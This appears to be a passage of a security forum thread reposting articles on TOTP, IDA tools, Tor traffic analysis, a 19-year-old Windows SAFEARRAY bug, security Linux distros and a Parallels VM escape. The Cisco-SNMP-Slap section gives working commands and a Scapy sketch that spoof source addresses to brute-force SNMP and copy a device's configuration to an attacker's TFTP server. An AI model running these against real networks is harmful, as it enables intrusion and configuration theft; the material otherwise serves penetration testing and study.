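    key = base64.b32decode(secret_b32)
    counter = struct.pack(">Q", int(time.time()) // period)
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F  # dynamic truncation, per RFC 4226
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # a fresh 6-digit code every 30 seconds

The security property is the one Janus describes: each code expires within seconds of being issued, so phishing a single value buys an attacker very little compared with stealing a static Verified by Visa password.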
  12. IODIDE - The IOS Debugger and Integrated Disassembler Environment

Released as open source by NCC Group Plc - http://www.nccgroup.com/
Developed by Andy Davis, andy dot davis at nccgroup dot com
https://github.com/nccgroup/IODIDE
Released under AGPL, see LICENSE for more information
Includes the PowerPC disassembler from cxmon by Christian Bauer, Marc Hellwig (The Official cxmon Home Page)

Documentation
https://github.com/nccgroup/IODIDE/wiki

Pre-requisites
- Python
- wxPython
- pyserial

Platforms
Tested on Windows 7

Sursa: https://github.com/nccgroup/IODIDE
  13. IDA Skins

Plugin providing advanced skinning support for the Qt version of IDA Pro utilizing Qt stylesheets, similar to CSS.

Screenshot
The screenshot (not reproduced here) shows the enclosed stylesheet.css in combination with the idaConsonance theme.

Binary distribution
Download the latest binary version from GitHub.

Installation
Place IDASkins.plX into the plugins directory of your IDA installation. The theme files (the skin directory) need to be copied to the root of your IDA installation.

Theming
Theming IDA using IDASkins works using Qt stylesheets. For information on the most important IDA-specific UI elements, take a look at the enclosed default stylesheet.css.

Sursa: https://github.com/athre0z/ida-skins
  14. Traffic Analysis Attacks and Defenses in Low Latency Anonymous Communication

Sambuddho Chakravarty

The recent public disclosure of mass surveillance of electronic communication, involving powerful government authorities, has drawn the public's attention to issues regarding Internet privacy. For almost a decade now, there have been several research efforts towards designing and deploying open source, trustworthy and reliable systems that ensure users' anonymity and privacy. These systems operate by hiding the true network identity of communicating parties against eavesdropping adversaries. Tor, an acronym for The Onion Router, is an example of such a system. Such systems relay the traffic of their users through an overlay of nodes that are called Onion Routers and are operated by volunteers distributed across the globe. Such systems have served well as anti-censorship and anti-surveillance tools. However, recent publications have disclosed that powerful government organizations are seeking means to de-anonymize such systems and have deployed distributed monitoring infrastructure to aid their efforts.

Attacks against anonymous communication systems, like Tor, often involve traffic analysis. In such attacks, an adversary, capable of observing network traffic statistics in several different networks, correlates the traffic patterns in these networks, and associates otherwise seemingly unrelated network connections. The process can lead an adversary to the source of an anonymous connection. However, due to their design, consisting of globally distributed relays, the users of anonymity networks like Tor can route their traffic virtually via any network, hiding their tracks and true identities from their communication peers and eavesdropping adversaries. De-anonymization of a random anonymous connection is hard, as the adversary is required to correlate traffic patterns in one network link to those in virtually all other networks.

Past research mostly involved reducing the complexity of this process by first reducing the set of relays or network routers to monitor, and then identifying the actual source of anonymous traffic among the network connections that are routed via this reduced set. A study of various research efforts in this field reveals that there have been many more efforts to reduce the set of relays or routers to be searched than to explore methods for actually identifying an anonymous user amidst the network connections using these routers and relays. Few have tried to comprehensively study a complete attack, one that involves both reducing the set of relays and routers to monitor and identifying the source of an anonymous connection. Although it is believed that systems like Tor are trivially vulnerable to traffic analysis, there are various technical challenges and issues that can become obstacles to accurately identifying the source of an anonymous connection. It is hard to adjudge the vulnerability of anonymous communication systems without adequately exploring the issues involved in identifying the source of anonymous traffic.

Download: http://cryptome.org/2014/11/sambuddho_thesis.pdf
  15. Cisco-SNMP-Slap

OVERVIEW
========

cisco-snmp-slap utilises IP address spoofing in order to bypass an ACL protecting an SNMP service on a Cisco IOS device.

Typically IP spoofing has limited use during real attacks outside DoS: a TCP service cannot complete the initial handshake, and while UDP packets are easier to spoof, the return packet is sent to the spoofed address, which makes it difficult to collect any information returned. However, if an attacker can guess the SNMP rw community string and a valid source address, the attacker can set SNMP MIBs. One of the more obvious uses for this is to have a Cisco SNMP service send its IOS configuration file to another device.

This tool allows you to try one or more community strings against a Cisco device from one or more IP addresses. When specifying IP addresses you can choose to sequentially or randomly go through a range of source addresses. To specify a range of source IP addresses to check, an initial source address and an IP mask are supplied. Any bits set in the IP mask will be used to generate source IP addresses by altering the initial source address. For example, if a source address of `10.0.0.0` is supplied with an IP mask of 0.0.0.255 then the script will explore the addresses from `10.0.0.0` to `10.0.0.255`. The bits set do not have to be sequential like a subnet mask. For example the mask 0.128.1.255 is valid and will explore the ranges `10.{0,128}.{0,1}.0-255`.

When checking a range of IP addresses randomly or sequentially it requires you to enter the path to the root of the tftp directory. The script will check this directory to see if the file has been successfully transferred.

This tool was written to target Cisco layer 3 switches during pentests, though it may have other uses. It works well against these devices because:

1. layer 3 switches rarely have reverse path verification configured, in the author's experience
2. there are no routers or other devices which may be able to detect that IP spoofing is occurring.

Though I hope that users will find other interesting uses for this script and its source code.

USAGE
=====

In this example I will take a simple IOS device with an access list protecting an SNMP service using the community string 'cisco':

access-list 10 permit 10.100.100.0 0.0.0.255
snmp-server community cisco rw 10

The IOS device's IP address is `10.0.0.1`. The pentester has the IP address `10.0.0.2` and has started a TFTP server. If the tester knows all of this they can use the one-shot single mode to grab the device's config file. E.g.

./slap.py single cisco 10.0.0.2 10.100.100.100 10.0.0.1

If the tester doesn't know the details, they could try to guess them. Let's say the tester has done some recon and has figured out that all internal addresses are in the 10.0.0.0/8 range:

./slap.py seqmask private 10.0.0.2 10.0.0.0 0.255.255.0 10.0.0.1 /tftproot/

This command will search through all the /24s; the tester hopes they can save some time by assuming a whole subnet will be allowed access rather than just one IP address.

root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask cisco 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/
Cisco SNMP Slap, v0.3
Darren McDonald, darren.mcdonald@nccgroup.com
WARNING: No route found for IPv6 destination :: (no default route?)
Community String: cisco
TFTP Server IP : 10.0.0.2
Source IP: 10.0.0.5
Source Mask: 0.255.255.0
Destination IP: 10.0.0.1
TFTP Root Path: /tftproot//cisco-config.txt
10.0.0.5
10.0.1.5
10.0.2.5
< ... cut for brevity ... >
10.100.99.255
10.100.100.0
10.100.100.1
10.100.100.2
10.100.100.3
10.100.100.4
10.100.100.5
10.100.100.6
Success!

You should notice that the program exits and announces success several IP addresses after it enters the `10.100.100.0/24` range. This is because it is not possible to determine which source address was successful; the script only determines that one of the requests succeeded once the config file turns up in the tftproot. Given you've just nabbed the running config, you can now find out the details of the ACL yourself.

Rather than specifying a single community string you can also give a list which should be used. The mode names are the same except they have a `'_l'` suffix. For example, to repeat the same attack using a list of community strings in list.txt the following arguments should be used:

root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask_l list.txt 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/
Cisco SNMP Slap, v0.3
Darren McDonald, darren.mcdonald@nccgroup.com
WARNING: No route found for IPv6 destination :: (no default route?)
Community File: list.txt
TFTP Server IP : 10.0.0.2
Source IP: 10.0.0.5
Source Mask: 0.255.255.0
Destination IP: 10.0.0.1
TFTP Root Path: /tftproot//cisco-config.txt
community strings loaded: ['private\n', 'cisco\n', 'public\n']
10.0.0.5 / private
10.0.0.5 / cisco
10.0.0.5 / public
10.0.1.5 / private
10.0.1.5 / cisco
10.0.1.5 / public
10.0.2.5 / private
10.0.2.5 / cisco
10.0.2.5 / public
10.0.3.5 / private
10.0.3.5 / cisco
10.0.3.5 / public

Now each IP address is checked with each community string in list.txt.

SUPPORT
=======

As programming languages go Python is a simple language, easy to read and write, and I encourage you to attempt to debug and correct any issues you find and send me your changes so I can share them with other users on the NCC Github. But if you need assistance you can contact me at darren.mcdonald@nccgroup.com. I'll do my best to help you, but you should be aware I am not a full time developer (which should be obvious from my code!) and may not immediately have time to get to your query.

VERSIONS
========

* 0.1 Initial version
* 0.2 Added random and sequential modes and source address masks
* 0.3 Added community string file list feature, first public version

Sursa: https://github.com/nccgroup/Cisco-SNMP-Slap
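To make the underlying trick concrete, here is a rough sketch of the kind of spoofed packet slap.py sends for each candidate source address. It is my own illustration rather than code from the tool, though judging by the Scapy warning in the sample output above, the tool itself is built on Scapy. The addresses and community string follow the README's example; the writeNet OID (1.3.6.1.4.1.9.2.1.55.<tftp-ip>) is the classic way of asking a legacy IOS device to copy its running-config to a TFTP server:

from scapy.all import IP, UDP, SNMP, SNMPset, SNMPvarbind, ASN1_OID, ASN1_STRING, send

SPOOFED_SRC = "10.100.100.100"  # a source address the ACL permits (guessed)
TARGET = "10.0.0.1"             # the Cisco IOS device
TFTP_SERVER = "10.0.0.2"        # the attacker's TFTP server

# Setting writeNet.<tftp-ip> to a filename asks old IOS images to upload
# their running-config to that TFTP host under that name.
varbind = SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.2.1.55." + TFTP_SERVER),
                      value=ASN1_STRING("cisco-config.txt"))

pkt = (IP(src=SPOOFED_SRC, dst=TARGET) /
       UDP(sport=161, dport=161) /
       SNMP(community="cisco", PDU=SNMPset(varbindlist=[varbind])))

send(pkt, verbose=False)  # any SNMP reply goes to the spoofed address, not to us

Because the reply is routed to the spoofed host, success cannot be observed directly; as the README explains, the script instead watches the TFTP root until the config file appears.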
  16. Eric Lippert Dissects CVE-2014-6332, a 19 year-old Microsoft bug

Posted by Eric, Nov 14, 2014

Today's Coverity Security Research Lab blog post is from guest blogger Eric Lippert.

[UPDATE 1: The MISSING_RESTORE checker regrettably doesn't find the defect in the code I've posted here. Its heuristics for avoiding false positives cause it to suppress reporting, ironically enough. We're working on tweaking that heuristic for an upcoming release.]

It was with a bizarre combination of nostalgia and horror that I read this morning about a 19-year-old rather severe security hole in Windows. Nostalgia because every bit of the exploited code is very familiar to me: working on the portion of the VBScript engine used to exploit the defect was one of my first jobs at Microsoft back in the mid-1990s. And horror because this is really a quite serious defect that has been present probably since Windows 3.1, [Update 2: heard that Windows 3.1 is in fact not affected, so you IE 2-5 users are safe] and definitely exploitable since Windows 95. Fortunately we have no evidence that this exploit has actually been used to do harm to users, and Microsoft has released a patch. (Part of my horror was the fear that maybe this one was my bad, but it looks like the actual bug predates my time at Microsoft. Whew!)

The thirty-thousand foot view is the old familiar story. An attacker who wishes to run arbitrary code on a user's machine lures the user into browsing to a web page that contains some hostile script -- VBScript, in this case. The hostile script is running inside a "sandbox" which is supposed to ensure that it only does "safe" operations, but the script attempts to force a particular buggy code path through the underlying operating system code. If it does so successfully, it produces a corrupt data structure in memory which can then be further manipulated by the script. By cleverly controlling the contents of the corrupted data structure, the hostile script can read or write memory and execute code of their choice.

Today I want to expand a bit on Robert Freeman's writeup, linked above, to describe the underlying bug in more detail, the pattern that likely produced it, better ways to write the code, and whether static analysis tools could find this bug. I'm not going to delve into the specifics of how this initially-harmless-looking bug can be exploited by attackers.

What's so safe about a SAFEARRAY?

Many of the data structures familiar to COM programmers today, like VARIANT, BSTR and SAFEARRAY, were created for "OLE Automation"; old-timers will of course remember that OLE stood for "object linking and embedding", the "paste this Excel spreadsheet into that Word document" feature. OLE Automation was the engine that enabled Word and Excel objects to be accessed programmatically by Visual Basic. (In fact the B in BSTR stands for "Basic".) Naturally, Visual Basic uses these data structures for its representations of strings and arrays.
The data structure which particularly concerns us today is SAFEARRAY:

typedef struct tagSAFEARRAY {
    USHORT         cDims;         // number of dimensions
    USHORT         fFeatures;     // type of elements
    ULONG          cbElements;    // byte size per element
    ULONG          cLocks;        // lock count
    PVOID          pvData;        // data buffer
    SAFEARRAYBOUND rgsabound[1];  // bounds, one per dimension
} SAFEARRAY;

typedef struct tagSAFEARRAYBOUND {
    ULONG cElements; // number of indices in this dimension
    LONG  lLbound;   // lowest valid index
} SAFEARRAYBOUND;

SAFEARRAYs are so-called because unlike an array in C or C++, a SAFEARRAY inherently knows the dimensionality of the array, the type of the data in the array, the number of bytes in the buffer, and finally, the bounds on each dimension. How multi-dimensional arrays and arrays of unusual types are handled is irrelevant to our discussion today, so let's assume that the array involved in the attack is a single-dimensional array of VARIANT.

The operating system method which contained the bug was SafeArrayRedim, which takes an existing array and a new set of bounds for the least significant dimension -- though again, for our purposes, we'll assume that there is only one dimension. The function header is:

HRESULT SafeArrayRedim(
    SAFEARRAY      *psa,
    SAFEARRAYBOUND *psaboundNew
)

Now, we do not have the source code of this method, but based on the description of the exploit we can guess that it looks something like the code below that I made up just now. Bits of code that are not particularly germane to the defect I will omit, and I'll assume that somehow the standard OLE memory allocator has been obtained. Of course there are many cases that must be considered here -- such as "what if the lock count is non zero?" -- that I am going to ignore in pursuit of understanding the relevant bug today. As you're reading the code, see if you can spot the defect:

{
  // Omitted: verify that the arguments are valid; produce
  // E_INVALIDARG or other error if they are not.

  PVOID pResourcesToCleanUp = NULL; // We'll need this later.
  HRESULT hr = S_OK;

  // How many bytes do we need in the buffer for the original array?
  // and for the new array?
  LONG cbOriginalSize = SomehowComputeTotalSizeOfOriginalArray(psa);
  LONG cbNewSize = SomehowComputeTotalSizeOfNewArray(psa, psaboundNew);
  LONG cbDifference = cbNewSize - cbOriginalSize;
  if (cbDifference == 0)
  {
    goto DONE;
  }

  SAFEARRAYBOUND originalBound = psa->rgsabound[0];
  psa->rgsabound[0] = *psaboundNew;

  // continues below ...

Things are looking pretty reasonable so far. Now we get to the tricky bit.

Why is it so hard to shrink an array?

If the array is being made smaller, the variants that are going to be dropped on the floor might contain resources that need to be cleaned up. For example, if we have an array of 1000 variants containing strings, and we reallocate that to only 300, those 700 strings need to be freed. Or, if instead of strings they are COM objects, they need to have their reference counts decreased.

But now we are faced with a serious problem. We cannot clean up the resources after the reallocation. If the reallocation succeeds then we no longer have any legal way to access the memory that we need to scan for resources to free; that memory could be shredded, or worse, it could be reallocated to another block on another thread and filled in with anything. You simply cannot touch memory after you've freed it. But we cannot clean up resources before the reallocation either, because what if the reallocation fails? It is rare for a reallocation that shrinks a block to fail.
While the documentation for IMalloc::Realloc doesn't call out that it can fail when shrinking (doc bug?), it doesn't rule it out either. In that case we have to return the original array, untouched, and deallocating 70% of the strings in the array is definitely not "untouched". The solution to this impasse is we have to allocate a new block and copy the resources into that new block before the reallocation. After a successful reallocation we can clean up the resources; after a failed reallocation we of course do not.

  // ... continued from above
  if (cbDifference < 0)
  {
    pResourcesToCleanUp = pmalloc->Alloc(-cbDifference);
    if (pResourcesToCleanUp == NULL)
    {
      hr = E_OUTOFMEMORY;
      goto DONE;
    }
    // Omitted: memcpy the resources to pResourcesToCleanUp
  }

  PVOID pNewData = pmalloc->Realloc(psa->pvData, cbNewSize);
  if (pNewData == NULL)
  {
    psa->rgsabound[0] = originalBound;
    hr = E_OUTOFMEMORY;
    goto DONE;
  }
  psa->pvData = pNewData;

  if (cbDifference < 0)
  {
    // Omitted: clean up the resources in pResourcesToCleanUp
  }
  else
  {
    // Omitted: initialize the new array slots to zero
  }

  hr = S_OK; // Success!

DONE:
  // Don't forget to free that extra block.
  if (pResourcesToCleanUp != NULL)
    pmalloc->Free(pResourcesToCleanUp);
  return hr;
}

Did you spot the defect? Part of the contract of this method is that when this method returns a failure code, the original array is unchanged. The contract is violated in the code path where the array is being shrunk and the allocation of pResourcesToCleanUp fails. In that case we return a failure code, but never restore the state of the bounds which were mutated earlier to the smaller values. Compare this code path to the code path where the reallocation fails, and you'll see that the restoration line is missing.

In a world where there is no hostile code running on your machine, this is not a serious bug. What's the worst that can happen? In the incredibly rare case where you are shrinking an array by an amount bigger than the memory you have available in the process, you end up with a SAFEARRAY that has the wrong bounds in a program that just produced a reallocation error anyways, and any resources that were in that memory are never freed. Not a big deal. This is the world in which OLE Automation was written: a world where people did not accidentally download hostile code off the Internet and run it automatically.

But in our world this bug is a serious problem! An attacker can make what used to be an incredibly rare situation -- running out of virtual address space at exactly the wrong time -- quite common by carefully controlling how much memory is allocated at any one time by the script. An attacker can cause the script engine to ignore the reallocation error and keep on processing the now-internally-inconsistent array. And once we have an inconsistent data structure in memory, the attacker can use other sophisticated techniques to take advantage of this corrupt data structure to read and write memory that they have no business reading and writing. Like I said before, I'm not going to go into the exact details of the further exploits that take advantage of this bug; today I'm interested in the bug itself.

How can we avoid this defect? How can we detect it?

It is surprisingly easy to write these sorts of bugs in COM code. What can you do to avoid this problem? I wrote who knows how many thousands of lines of COM code in my early days at Microsoft, and I avoided these problems by application of a strict discipline.
Among my many rules for myself were:

- Every method has exactly one exit point.
- Every local variable is initialized to a sensible value or NULL.
- Every non-NULL local variable is cleaned up at the exit point. Conversely, if the resource is cleaned up early on a path, or if its ownership is ever transferred elsewhere, then the local is set back to NULL.
- Methods which modify memory locations owned by their callers do so only at the exit point, and only when the method is about to return a success code.

The code which I've presented here today -- which I want to emphasize again I made up myself just now to illustrate what the original bug probably looks like -- follows some of these best practices, but not all of them. There is one exit point. Every local is initialized. One of the resources -- the pResourcesToCleanUp block -- is cleaned up correctly at the exit point. But the last rule is violated: memory owned by the caller is modified early, rather than immediately before returning success. The requirement that the developer always remember to re-mutate the caller's data in the event of an error is a bug waiting to happen, and in this case, it did happen.

Clearly the code I presented today does not follow my best practices for writing good COM methods. Is there a more general pattern to this defect? A closely related defect pattern that I see quite often in C, C++, C# and Java is:

someLocal = someExternal;
someExternal = differentValue;
DoSomethingThatDependsOnTheExternal();
//... lots of code ...
if (someError)
  return;
//... lots of code ...
someExternal = someLocal;

And of course the variation where the restoration of the external value is skipped because of an unhandled exception is common in C++, C# and Java.

Could a static analyzer help find defects like this? Certainly; Coverity's MISSING_RESTORE analyzer finds defects of the form I've just described. (Though I have not yet had a chance to run the code I presented today through it to see what happens.) There are a lot of challenges in designing analyzers to find the defect I presented today; one is determining that in this code the missing restoration is a defect on the error path but correct on the success path.

This real-world defect is a good inspiration for some avenues for further research in this area; have you seen similar defects that follow this pattern in real-world code, in any language? I'd love to see your examples; please leave a comment if you have one.

Sursa: Coverity Security Research Lab
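Lippert's closing pattern translates to any language with caller-visible state. As a hedged illustration (an invented example, not Lippert's code and not Coverity output), here is the same missing-restore defect and its fix in Python: the caller-owned bound is mutated before an allocation that can fail, so the error path must put it back.

def redim(array_meta, new_bound, allocate):
    """Resize a caller-owned descriptor; 'allocate' may raise MemoryError."""
    original = array_meta["bound"]
    array_meta["bound"] = new_bound      # caller-visible mutation, done early
    try:
        scratch = allocate(abs(new_bound - original))
    except MemoryError:
        array_meta["bound"] = original   # the restore the buggy code path forgot
        raise
    # ... copy resources, reallocate, clean up ...
    return scratch

Better still, follow the last of the rules quoted above and delay the mutation until failure is no longer possible; then there is nothing to restore.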
  17. Linux Security Distros Compared: Tails vs. Kali vs. Qubes

By Thorin Klosowski

If you're interested in security, you've probably already heard of security-focused Linux distros like Tails, Kali, and Qubes. They're really useful for browsing anonymously, penetration testing, and tightening down your system so it's secure from would-be hackers. Here are the strengths and weaknesses of all three.

It seems like every other day we hear about another hack, browser exploit, or nasty bit of malware. If you do a lot of your browsing on public Wi-Fi networks, you're a lot more susceptible to these types of hacks. A security-focused distribution of Linux can help. For most of us, the use cases here are pretty simple. If you need to use a public Wi-Fi network at a coffee shop or the library, then one of these distributions can hide your traffic from someone trying to peek in. Likewise, if you're worried about someone tracking down your location—whether it's a creepy stalker or something even worse—randomizing and anonymizing your traffic keeps you safe. Obviously you don't need this all the time, but if you're checking bank statements, uploading documents onto a work server, or even just doing some shopping, it's better to be safe than sorry.

All of these distributions can run in a virtual machine or from a Live CD/USB. That means you can carry them around in your pocket and boot into them when you need to without causing yourself too much trouble.

Tails Provides Security Through Anonymity

Tails is a live operating system built on Debian that uses Tor for all its internet traffic. Its main goal is to give you security through anonymity. With it, you can browse the web anonymously through encrypted connections. Tails protects you in a number of ways. First, since all your traffic is routed through Tor, it's incredibly difficult to track your physical location or see which sites you visit. Tails doesn't use a computer's hard disk, so nothing you do is saved to the computer you're running it on. Instead, everything you're working on is stored in RAM and erased when you shut down. This means any sensitive documents you're working on are never stored permanently. Because of that, Tails is a really good operating system to use when you're on a public computer or network.

Tails is also packed with a bunch of basic cryptographic tools. If you're running Tails off a USB drive, it's encrypted with LUKS. All your internet traffic is encrypted with HTTPS Everywhere, your IM conversations are encrypted with OTR, and your emails and documents are encrypted with OpenPGP.

The crux of Tails is anonymity. While it has cryptographic tools in place, its main purpose is to anonymize everything you're doing online. This is great for most people, but it doesn't give you the freedom to do stupid things. If you log into your Facebook account under your real name, it's still going to be obvious who you are, and remaining anonymous on an online community is a lot harder than it seems.

Pros: Routes all your traffic through Tor, comes with a ton of open-source software, has a "Windows Camouflage" mode to make it look more like Windows 8.

Cons: Can't save files locally, slow, loading web sites through Tor takes forever.

Who It's Best For: Tails is best suited for on-the-go security. If you find yourself at coffee shops or public libraries using the internet a lot, then Tails is perfect for you.
Anonymity is the game, so if you're sick of everyone tracking what you're doing, Tails is great, but keep in mind that it's also pretty useless unless you use pseudonyms everywhere online.

Kali Is All About Offensive Security

Where Tails is about anonymity, Kali is mostly geared toward security testing. Kali is built on Debian and maintained by Offensive Security Ltd. You can run Kali off a Live CD, USB drive, or in a virtual machine. Kali's main focus is on pen testing, which means it's great for poking around for security holes in your own network, but isn't built for general use. That said, it does have a few basic packages, including Iceweasel for browsing the web and everything you need to run a secure server with SSH, FTP, and more. Likewise, Kali is packed with tools to hide your location and set up VPNs, so it's perfectly capable of keeping you anonymous.

Kali has around 300 tools for testing the security of a network, so it's hard to really keep track of what's included, but the most popular thing to do with Kali is crack a Wi-Fi password. Kali's motto adheres to "the best defense is a good offense," so it's meant to help you test the security of your network as a whole, rather than just making you secure on one machine. Still, if you use Kali Linux, it won't leave anything behind on the system you're running it on, so it's pretty secure itself. Besides a Live CD, Kali can also run on a ton of ARM devices, including the Raspberry Pi, BeagleBone, several Chromebooks, and even the Galaxy Note 10.1.

Pros: Everything you need to test a network is included in the distribution, it's relatively easy to use, and can be run on both a Live CD and in a virtual machine.

Cons: Doesn't include too many tools for everyday use, doesn't include the cryptographic tools that Tails does.

Who It's Best For: Kali is best suited for IT administrators and hobbyists looking to test their network for security holes. While it's secure itself, it doesn't have the basic daily use stuff most of us need from an operating system.

Qubes Offers Security Through Isolation

Qubes is a desktop environment based on Fedora that's all about security through isolation. Qubes assumes that there can't be a truly secure operating system, so instead it runs everything inside of virtual machines. This ensures that if you fall victim to a malicious attack, it doesn't spread to the operating system as a whole.

With Qubes, you create virtual machines for each of your environments. For example, you could create a "Work" virtual machine that includes Firefox and Thunderbird, a "Shopping" virtual machine that includes just Firefox, and then whatever else you need. This way, when you're messing around in the "Shopping" virtual machine, it's isolated from your "Work" virtual machine in case something goes wrong. You can create virtual machines of Windows and Linux. You can also create disposable virtual machines for one-time actions. Whatever happens within these virtual machines is isolated, but it's not secured. If you run a buggy web browser, Qubes doesn't do much to stop the exploit.

The architecture itself is set up to protect you as well. Your network connection automatically gets its own virtual machine and you can set up a proxy server for more security. Likewise, storage gets its own virtual machine as well, and everything on your hard drive is automatically encrypted. The major downfall with Qubes is the fact that you need to do everything manually.
Setting up virtual machines secures your system as a whole, but you have to be proactive in actually using them. If you want your data to remain secure, you have to separate it from everything else.

Pros: The isolation technique ensures that if you do download malware, your entire system isn't infected. Qubes works on a wide variety of hardware, and it's easy to securely share clipboard data between VMs.

Cons: Qubes requires that you take action to create the VMs, so none of the security measures are foolproof. It's still totally susceptible to malware or other attacks too, but there's less of a chance that it'll infect your whole system.

Who It's Best For: Qubes is best for proactive types who don't mind doing a bit of work to set up a secure environment. If you're working on something you don't want in other people's hands, writing out a bunch of personal information, or you're just handing over your computer to a friend who loves clicking on malicious-looking sites, then a virtual machine's an easy way to keep things secure. Where something like Tails does everything for you out of the box, Qubes takes a bit of time to set up and get working. The Qubes user manual is pretty giant, so you have to be willing to spend some time learning it.

The Rest: Ubuntu Privacy Remix, JonDo, and IprediaOS

Tails, Kali, and Qubes certainly aren't the only security-focused operating systems around. Let's take a quick look at a few other popular options.

Ubuntu Privacy Remix: As the name suggests, Ubuntu Privacy Remix is a privacy-focused distribution built on Ubuntu. It's offline-only, so it's basically impossible for anyone to hack into it. The operating system is read-only so it can't be changed, and you can only store data on encrypted removable media. It has a few other tricks up its sleeve, including a system to block third parties from activating your network connection and TrueCrypt encryption.

JonDo: JonDo is a Live DVD based on Debian that contains proxy clients, a preconfigured browser for anonymous surfing, and a number of basic-level security tools. It's similar to Tails, but is a bit more simplified and unfamiliar.

IprediaOS: Like Tails, IprediaOS is all about anonymity. Instead of routing traffic through Tor, IprediaOS routes through I2P.

Of course, none of these operating systems are particularly ideal for day-to-day use. When you're anonymizing your traffic, hiding it away, or isolating it from the rest of your operating system, you tend to eat up system resources and slow things down. Likewise, the bandwidth costs mean most of your web browsing is pretty terrible. All that said, these systems are great when you're on public Wi-Fi, using a public computer, or when you just need to use a friend's computer that you don't want to leave your private data on. They're all secure enough to protect most of us with our general behavior, so pick whichever one is best suited for your particular needs.

Sursa: Linux Security Distros Compared: Tails vs. Kali vs. Qubes
  18. Traffic correlation using netflows Posted November 14th, 2014 by arma in People are starting to ask us about a recent tech report from Sambuddho's group about how an attacker with access to many routers around the Internet could gather the netflow logs from these routers and match up Tor flows. It's great to see more research on traffic correlation attacks, especially on attacks that don't need to see the whole flow on each side. But it's also important to realize that traffic correlation attacks are not a new area. This blog post aims to give you some background to get you up to speed on the topic. First, you should read the first few paragraphs of the One cell is enough to break Tor's anonymity analysis: First, remember the basics of how Tor provides anonymity. Tor clients route their traffic over several (usually three) relays, with the goal that no single relay gets to learn both where the user is (call her Alice) and what site she's reaching (call it Bob). The Tor design doesn't try to protect against an attacker who can see or measure both traffic going into the Tor network and also traffic coming out of the Tor network. That's because if you can see both flows, some simple statistics let you decide whether they match up. Because we aim to let people browse the web, we can't afford the extra overhead and hours of additional delay that are used in high-latency mix networks like Mixmaster or Mixminion to slow this attack. That's why Tor's security is all about trying to decrease the chances that an adversary will end up in the right positions to see the traffic flows. The way we generally explain it is that Tor tries to protect against traffic analysis, where an attacker tries to learn whom to investigate, but Tor can't protect against traffic confirmation (also known as end-to-end correlation), where an attacker tries to confirm a hypothesis by monitoring the right locations in the network and then doing the math. And the math is really effective. There are simple packet counting attacks (Passive Attack Analysis for Connection-Based Anonymity Systems) and moving window averages (Timing Attacks in Low-Latency Mix-Based Systems), but the more recent stuff is downright scary, like Steven Murdoch's PET 2007 paper about achieving high confidence in a correlation attack despite seeing only 1 in 2000 packets on each side (Sampled Traffic Analysis by Internet-Exchange-Level Adversaries). Second, there's some further discussion about the efficacy of traffic correlation attacks at scale in the Improving Tor's anonymity by changing guard parameters analysis: Tariq's paper makes two simplifying assumptions when calling an attack successful [...] 2) He assumes that the end-to-end correlation attack (matching up the incoming flow to the outgoing flow) is instantaneous and perfect. [...] The second one ("how successful is the correlation attack at scale?" or maybe better, "how do the false positives in the correlation attack compare to the false negatives?") remains an open research question. Researchers generally agree that given a handful of traffic flows, it's easy to match them up. But what about the millions of traffic flows we have now? What levels of false positives (algorithm says "match!" when it's wrong) are acceptable to this attacker? Are there some simple, not too burdensome, tricks we can do to drive up the false positives rates, even if we all agree that those tricks wouldn't work in the "just looking at a handful of flows" case? 
More precisely, it's possible that correlation attacks don't scale well because as the number of Tor clients grows, the chance that the exit stream actually came from a different Tor client (not the one you're watching) grows. So the confidence in your match needs to grow along with that or your false positive rate will explode. The people who say that correlation attacks don't scale use phrases like "say your correlation attack is 99.9% accurate" when arguing it. The folks who think it does scale use phrases like "I can easily make my correlation attack arbitrarily accurate." My hope is that the reality is somewhere in between — correlation attacks in the current Tor network can probably be made plenty accurate, but perhaps with some simple design changes we can improve the situation.

The discussion of false positives is key to this new paper too: Sambuddho's paper mentions a false positive rate of 6%. That sounds like it means if you see a traffic flow at one side of the Tor network, and you have a set of 100000 flows on the other side and you're trying to find the match, then 6000 of those flows will look like a match. It's easy to see how at scale, this "base rate fallacy" problem could make the attack effectively useless.

And that high false positive rate is not at all surprising, since he is trying to capture only a summary of the flows at each side and then do the correlation using only those summaries. It would be neat (in a theoretical sense) to learn that it works, but it seems to me that there's a lot of work left here in showing that it would work in practice. It also seems likely that his definition of false positive rate and my use of it above don't line up completely: it would be great if somebody here could work on reconciling them.

For a possibly related case where a series of academic research papers misunderstood the base rate fallacy and came to bad conclusions, see Mike's critique of website fingerprinting attacks plus the follow-up paper from CCS this year confirming that he's right.

I should also emphasize that whether this attack can be performed at all has to do with how much of the Internet the adversary is able to measure or control. This diversity question is a large and important one, with lots of attention already. See more discussion here.

In summary, it's great to see more research on traffic confirmation attacks, but a) traffic confirmation attacks are not a new area, so don't freak out without actually reading the papers, and b) this particular one, while kind of neat, doesn't supersede all the previous papers.

(I should put in an addendum here for the people who are wondering if everything they read on the Internet in a given week is surely all tied together: we don't have any reason to think that this attack, or one like it, is related to the recent arrests of a few dozen people around the world. So far, all indications are that those arrests are best explained by bad opsec for a few of them, and then those few pointed to the others when they were questioned.)

Sursa: https://blog.torproject.org/blog/traffic-correlation-using-netflows
  19. Simple guest to host VM escape for Parallels Desktop

This is the first post in this blog written in English, so please be patient with my awful language skills. This is a little story about exploiting a guest-to-host VM escape not-a-vulnerability in Parallels Desktop 10 for Mac. The discovered attack is not about serious hardcore stuff like hypervisor bugs or low-level vulnerabilities in guest-host communication interfaces; it can easily be performed even by very lame Windows malware if your virtual machine has insecure settings.

Discovering

It was always obvious to me that rich features for communicating with guest operating systems (almost any modern desktop virtualisation software has them) might be dangerous. Recently I finally decided to check how exactly they can be dangerous, using the virtualisation software that I'm using on OS X (as are millions of other users) as an example. It's a nice product, and I think it currently gets much less attention from security researchers than it actually deserves.

Parallels Desktop 10 virtual machines have a lot of user-friendly capabilities for making the guest operating system highly integrated with the host, and most of these options are enabled by default. Let's talk about one of them:

Parallels Desktop 10 VM options

